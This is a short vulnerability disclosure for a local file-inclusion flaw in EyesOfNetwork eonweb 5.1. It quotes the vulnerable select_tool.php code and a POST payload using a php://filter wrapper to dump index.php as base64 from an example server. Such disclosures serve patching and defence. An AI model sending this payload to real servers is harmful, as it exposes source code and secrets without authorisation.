Eonweb_module_tool_all_select_tool.php file include

Powered by minhaizhao from Anyuntec

version: 5.1

https://github.com/EyesOfNetworkCommunity/eonweb

Vulnerability details

0x01

/srv/eyesofnetwork/eonweb-5.1/module/tool_all/select_tool.php Line 58

if( $page != "" )
    {   
        if( $host_list == "" ){
            message(4,"Please select a host","critical");
        }
        else{
            //hostname selected.
            $tab_host=explode(",",$host_list);
            $host_name = $tab_host[0];
            $host = $host_name;
            
            if($host == "") message(4,"Please select a host","critical");
            else{
                include($url_tool);
            }
        }
    }

$url_tool has not been filtered to cause file include

EXP:

https://192.168.91.66/module/tool_all/select_tool.php

POST:

tool_list=php://filter/read=convert.base64-encode/resource=index.php&&snmp_version=1&page=2&host_list=1&url_tool=

Will return the base64 encoded index.php data

Alt text

Alt text